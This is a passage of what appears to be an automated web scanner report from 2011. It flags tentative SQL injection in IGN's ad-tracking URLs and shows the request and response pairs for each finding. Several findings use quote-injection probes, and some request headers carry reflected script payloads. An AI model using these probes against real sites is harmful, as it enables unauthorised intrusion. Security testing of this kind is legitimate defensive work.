Cookie: _br_uid_1=uid%3D6931773698889%3A%00'; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;

Response 1

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:46:59 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c02-24874-851431371-4;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:46:59 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043219281v-1n-12mc+1297043219281mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 125005

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <base target="_top"></bas
...[SNIP]...
<a href="http://www.eyewonderlabs.com/ct.cfm?ewbust=0&guid=0&ewadid=134339&eid=1409677&file=http://cdn.eyewonder.com/100125/766781/1409677/NOSCRIPTfailover.jpg&pnl=MainBanner&type=0&name=Clickthru-NOSCRIPT&num=1&time=0&diff=0&clkX=&clkY=&click=http://clk.redcated/IWC/go/277893011/direct/01/" target="_blank">
...[SNIP]...

Request 2

GET /ob2/068/142/14235018.html HTTP/1.1
Host: cheats.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _br_uid_1=uid%3D6931773698889%3A%00''; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;

Response 2

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:47:01 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1297043221074v-2n-12mc+1297043221074mv+2mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 129015

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <base target="_top"></bas
...[SNIP]...

1.4. http://de.ign.com/event.ng/Type=click&FlightID=69584&AdID=182992&TargetID=9128&Targets=6556,29462,7012,6505,8080,27699,28684,9128,6507,8524,9483,7085,6651,9170,10619,26089,27914,29365&Values=25,46,60,72,80,91,101,110,150,152,260,471,531,757,912,1187,1405,1481,1508,1591,1824,2336,3091,3887,3932,4056,4227,4662,4799,5999,6623,8151,8210,8978,9180,41899,61346,61578,61766,65369&RawValues=&Redirect= [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://de.ign.com
Path:   /event.ng/Type=click&FlightID=69584&AdID=182992&TargetID=9128&Targets=6556,29462,7012,6505,8080,27699,28684,9128,6507,8524,9483,7085,6651,9170,10619,26089,27914,29365&Values=25,46,60,72,80,91,101,110,150,152,260,471,531,757,912,1187,1405,1481,1508,1591,1824,2336,3091,3887,3932,4056,4227,4662,4799,5999,6623,8151,8210,8978,9180,41899,61346,61578,61766,65369&RawValues=&Redirect=

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /event.ng/Type'=click&FlightID=69584&AdID=182992&TargetID=9128&Targets=6556,29462,7012,6505,8080,27699,28684,9128,6507,8524,9483,7085,6651,9170,10619,26089,27914,29365&Values=25,46,60,72,80,91,101,110,150,152,260,471,531,757,912,1187,1405,1481,1508,1591,1824,2336,3091,3887,3932,4056,4227,4662,4799,5999,6623,8151,8210,8978,9180,41899,61346,61578,61766,65369&RawValues=&Redirect= HTTP/1.1
Host: de.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dmy.ign.com%253Awww.ign.com%3B%20s_c13%3Dmy.ign.com%253Awww.ign.com%3B%20s_sq%3D%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040561490v-1n-12mc+1297040561491mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=10089; s_pers=%20s_nr%3D1297040551494%7C1299632551494%3B%20s_lv%3D1297040551496%7C1391648551496%3B%20s_lv_s%3DFirst%2520Visit%7C1297042351496%3B; decc=US; NGUserID=a016c06-15003-1306593845-5; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.3.10.1297040497;

Response 1

HTTP/1.1 500 Internal Server Error
Server: Apache/2.2.16 (Unix)
Content-Length: 544
nnCoection: close
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 07 Feb 2011 01:21:59 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...

Request 2

GET /event.ng/Type''=click&FlightID=69584&AdID=182992&TargetID=9128&Targets=6556,29462,7012,6505,8080,27699,28684,9128,6507,8524,9483,7085,6651,9170,10619,26089,27914,29365&Values=25,46,60,72,80,91,101,110,150,152,260,471,531,757,912,1187,1405,1481,1508,1591,1824,2336,3091,3887,3932,4056,4227,4662,4799,5999,6623,8151,8210,8978,9180,41899,61346,61578,61766,65369&RawValues=&Redirect= HTTP/1.1
Host: de.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dmy.ign.com%253Awww.ign.com%3B%20s_c13%3Dmy.ign.com%253Awww.ign.com%3B%20s_sq%3D%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040561490v-1n-12mc+1297040561491mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=10089; s_pers=%20s_nr%3D1297040551494%7C1299632551494%3B%20s_lv%3D1297040551496%7C1391648551496%3B%20s_lv_s%3DFirst%2520Visit%7C1297042351496%3B; decc=US; NGUserID=a016c06-15003-1306593845-5; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.3.10.1297040497;

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.2.16 (Unix)
Content-Length: 0
Location: http://de.ign.com/
Content-Type: text/html
Expires: Mon, 07 Feb 2011 01:21:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:21:59 GMT
Connection: close


1.5. http://de.ign.com/event.ng/Type=click&FlightID=69584&AdID=182992&TargetID=9128&Targets=6556,29462,7012,6505,8080,27699,28684,9128,6507,8524,9483,7085,6651,9170,10619,26089,27914,29365&Values=25,46,60,72,80,91,101,110,150,152,260,471,531,757,912,1187,1405,1481,1508,1591,1824,2336,3091,3887,3932,4056,4227,4662,4799,5999,6623,8151,8210,8978,9180,41899,61346,61578,61766,65369&RawValues=&Redirect=http:/www.direct2drive.com/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://de.ign.com
Path:   /event.ng/Type=click&FlightID=69584&AdID=182992&TargetID=9128&Targets=6556,29462,7012,6505,8080,27699,28684,9128,6507,8524,9483,7085,6651,9170,10619,26089,27914,29365&Values=25,46,60,72,80,91,101,110,150,152,260,471,531,757,912,1187,1405,1481,1508,1591,1824,2336,3091,3887,3932,4056,4227,4662,4799,5999,6623,8151,8210,8978,9180,41899,61346,61578,61766,65369&RawValues=&Redirect=http:/www.direct2drive.com/

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /event.ng/Type'=click&FlightID=69584&AdID=182992&TargetID=9128&Targets=6556,29462,7012,6505,8080,27699,28684,9128,6507,8524,9483,7085,6651,9170,10619,26089,27914,29365&Values=25,46,60,72,80,91,101,110,150,152,260,471,531,757,912,1187,1405,1481,1508,1591,1824,2336,3091,3887,3932,4056,4227,4662,4799,5999,6623,8151,8210,8978,9180,41899,61346,61578,61766,65369&RawValues=&Redirect=http:/www.direct2drive.com/ HTTP/1.1
Host: de.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dmy.ign.com%253Awww.ign.com%3B%20s_c13%3Dmy.ign.com%253Awww.ign.com%3B%20s_sq%3D%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040561490v-1n-12mc+1297040561491mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=10089; s_pers=%20s_nr%3D1297040551494%7C1299632551494%3B%20s_lv%3D1297040551496%7C1391648551496%3B%20s_lv_s%3DFirst%2520Visit%7C1297042351496%3B; decc=US; NGUserID=a016c06-15003-1306593845-5; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.3.10.1297040497;

Response 1

HTTP/1.1 500 Internal Server Error
Server: Apache/2.2.16 (Unix)
Content-Length: 544
nnCoection: close
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 07 Feb 2011 01:17:13 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...

Request 2

GET /event.ng/Type''=click&FlightID=69584&AdID=182992&TargetID=9128&Targets=6556,29462,7012,6505,8080,27699,28684,9128,6507,8524,9483,7085,6651,9170,10619,26089,27914,29365&Values=25,46,60,72,80,91,101,110,150,152,260,471,531,757,912,1187,1405,1481,1508,1591,1824,2336,3091,3887,3932,4056,4227,4662,4799,5999,6623,8151,8210,8978,9180,41899,61346,61578,61766,65369&RawValues=&Redirect=http:/www.direct2drive.com/ HTTP/1.1
Host: de.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dmy.ign.com%253Awww.ign.com%3B%20s_c13%3Dmy.ign.com%253Awww.ign.com%3B%20s_sq%3D%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040561490v-1n-12mc+1297040561491mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=10089; s_pers=%20s_nr%3D1297040551494%7C1299632551494%3B%20s_lv%3D1297040551496%7C1391648551496%3B%20s_lv_s%3DFirst%2520Visit%7C1297042351496%3B; decc=US; NGUserID=a016c06-15003-1306593845-5; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.3.10.1297040497;

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.2.16 (Unix)
Content-Length: 0
Location: http://de.ign.com/http:/www.direct2drive.com/
Content-Type: text/html
Expires: Mon, 07 Feb 2011 01:17:13 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:17:13 GMT
Connection: close


1.6. http://de.ign.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=144177&FlightID=130644&TargetID=22858&EntityDefResetFlag=0&C=0&Segments=2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11754,14845,15232,15271,15363,16020,16249,16251,19623,22099,22854,23425,23427,23429,23472,23479,23480,23493&Targets=10619,22858,19760,24104&Values=25,31,43,60,72,80,91,101,110,150,152,235,448,531,757,912,1187,1405,1481,1508,1594,1824,2250,2868,3932,4056,4662,4799,5999,6623,8151,8978,41899,59028,59328,60710,61583,61766,65373&RawValues=&random=cmKIryK,bguRrblewbsuK [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://de.ign.com
Path:   /event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=144177&FlightID=130644&TargetID=22858&EntityDefResetFlag=0&C=0&Segments=2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11754,14845,15232,15271,15363,16020,16249,16251,19623,22099,22854,23425,23427,23429,23472,23479,23480,23493&Targets=10619,22858,19760,24104&Values=25,31,43,60,72,80,91,101,110,150,152,235,448,531,757,912,1187,1405,1481,1508,1594,1824,2250,2868,3932,4056,4662,4799,5999,6623,8151,8978,41899,59028,59328,60710,61583,61766,65373&RawValues=&random=cmKIryK,bguRrblewbsuK

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /event.ng/Type'=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=144177&FlightID=130644&TargetID=22858&EntityDefResetFlag=0&C=0&Segments=2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11754,14845,15232,15271,15363,16020,16249,16251,19623,22099,22854,23425,23427,23429,23472,23479,23480,23493&Targets=10619,22858,19760,24104&Values=25,31,43,60,72,80,91,101,110,150,152,235,448,531,757,912,1187,1405,1481,1508,1594,1824,2250,2868,3932,4056,4662,4799,5999,6623,8151,8978,41899,59028,59328,60710,61583,61766,65373&RawValues=&random=cmKIryK,bguRrblewbsuK HTTP/1.1
Host: de.ign.com
Proxy-Connection: keep-alive
Referer: http://cheats.ign.com/?7cd43%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebc6f5a7fbe9=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: decc=US; NGUserID=a016c02-23694-278760149-1; i18n-cc=US; freq=c-1297040427563v-1n-12mc+1297040427563mv+1mn+12wwe~0; ATA=ign.129704044868759.173.193.214.243

Response 1

HTTP/1.1 500 Internal Server Error
Server: Apache/2.2.16 (Unix)
Content-Length: 544
nnCoection: close
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 07 Feb 2011 01:43:54 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...

Request 2

GET /event.ng/Type''=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=144177&FlightID=130644&TargetID=22858&EntityDefResetFlag=0&C=0&Segments=2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11754,14845,15232,15271,15363,16020,16249,16251,19623,22099,22854,23425,23427,23429,23472,23479,23480,23493&Targets=10619,22858,19760,24104&Values=25,31,43,60,72,80,91,101,110,150,152,235,448,531,757,912,1187,1405,1481,1508,1594,1824,2250,2868,3932,4056,4662,4799,5999,6623,8151,8978,41899,59028,59328,60710,61583,61766,65373&RawValues=&random=cmKIryK,bguRrblewbsuK HTTP/1.1
Host: de.ign.com
Proxy-Connection: keep-alive
Referer: http://cheats.ign.com/?7cd43%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebc6f5a7fbe9=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: decc=US; NGUserID=a016c02-23694-278760149-1; i18n-cc=US; freq=c-1297040427563v-1n-12mc+1297040427563mv+1mn+12wwe~0; ATA=ign.129704044868759.173.193.214.243

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.2.16 (Unix)
Content-Length: 0
Location: http://ads.ign.com/advertisers/ign/1x1transparent.png
Content-Type: text/html
Expires: Mon, 07 Feb 2011 01:43:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:43:55 GMT
Connection: close
Vary: Accept-Encoding


1.7. http://de.ign.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=144177&FlightID=130644&TargetID=22858&EntityDefResetFlag=0&C=0&Segments=2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11754,14845,15232,15271,15363,16020,16249,16251,19623,22099,22854,23425,23427,23429,23472,23479,23480,23493&Targets=10619,22858,19760,24104&Values=25,31,43,60,72,80,91,101,110,150,152,235,448,531,757,912,1187,1405,1481,1508,1594,2250,2868,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59028,59328,60710,61583,61766,65373&RawValues=&random=bxmcqAA,bguRqRgbdmoWA [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://de.ign.com
Path:   /event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=144177&FlightID=130644&TargetID=22858&EntityDefResetFlag=0&C=0&Segments=2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11754,14845,15232,15271,15363,16020,16249,16251,19623,22099,22854,23425,23427,23429,23472,23479,23480,23493&Targets=10619,22858,19760,24104&Values=25,31,43,60,72,80,91,101,110,150,152,235,448,531,757,912,1187,1405,1481,1508,1594,2250,2868,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59028,59328,60710,61583,61766,65373&RawValues=&random=bxmcqAA,bguRqRgbdmoWA

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /event.ng/Type'=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=144177&FlightID=130644&TargetID=22858&EntityDefResetFlag=0&C=0&Segments=2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11754,14845,15232,15271,15363,16020,16249,16251,19623,22099,22854,23425,23427,23429,23472,23479,23480,23493&Targets=10619,22858,19760,24104&Values=25,31,43,60,72,80,91,101,110,150,152,235,448,531,757,912,1187,1405,1481,1508,1594,2250,2868,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59028,59328,60710,61583,61766,65373&RawValues=&random=bxmcqAA,bguRqRgbdmoWA HTTP/1.1
Host: de.ign.com
Proxy-Connection: keep-alive
Referer: http://cheats.ign.com/?7cd43%22%3E%3Cscript%3Ealert(1)%3C/script%3Ebc6f5a7fbe9=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=ign.129704044868759.173.193.214.243; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=634326084499542327&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; optimizelyEndUserId=oeu1297040486304r0.669825860997662; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; __utmb=173446715; __utmc=173446715; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; rsi_segs=; decc=US; NGUserID=a016c09-18740-885768600-2; i18n-cc=US; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; optimizelyBuckets=%7B%7D

Response 1

HTTP/1.1 500 Internal Server Error
Server: Apache/2.2.16 (Unix)
Content-Length: 544
nnCoection: close
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 07 Feb 2011 01:44:13 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...

Request 2

GET /event.ng/Type''=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=144177&FlightID=130644&TargetID=22858&EntityDefResetFlag=0&C=0&Segments=2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11754,14845,15232,15271,15363,16020,16249,16251,19623,22099,22854,23425,23427,23429,23472,23479,23480,23493&Targets=10619,22858,19760,24104&Values=25,31,43,60,72,80,91,101,110,150,152,235,448,531,757,912,1187,1405,1481,1508,1594,2250,2868,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59028,59328,60710,61583,61766,65373&RawValues=&random=bxmcqAA,bguRqRgbdmoWA HTTP/1.1
Host: de.ign.com
Proxy-Connection: keep-alive
Referer: http://cheats.ign.com/?7cd43%22%3E%3Cscript%3Ealert(1)%3C/script%3Ebc6f5a7fbe9=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
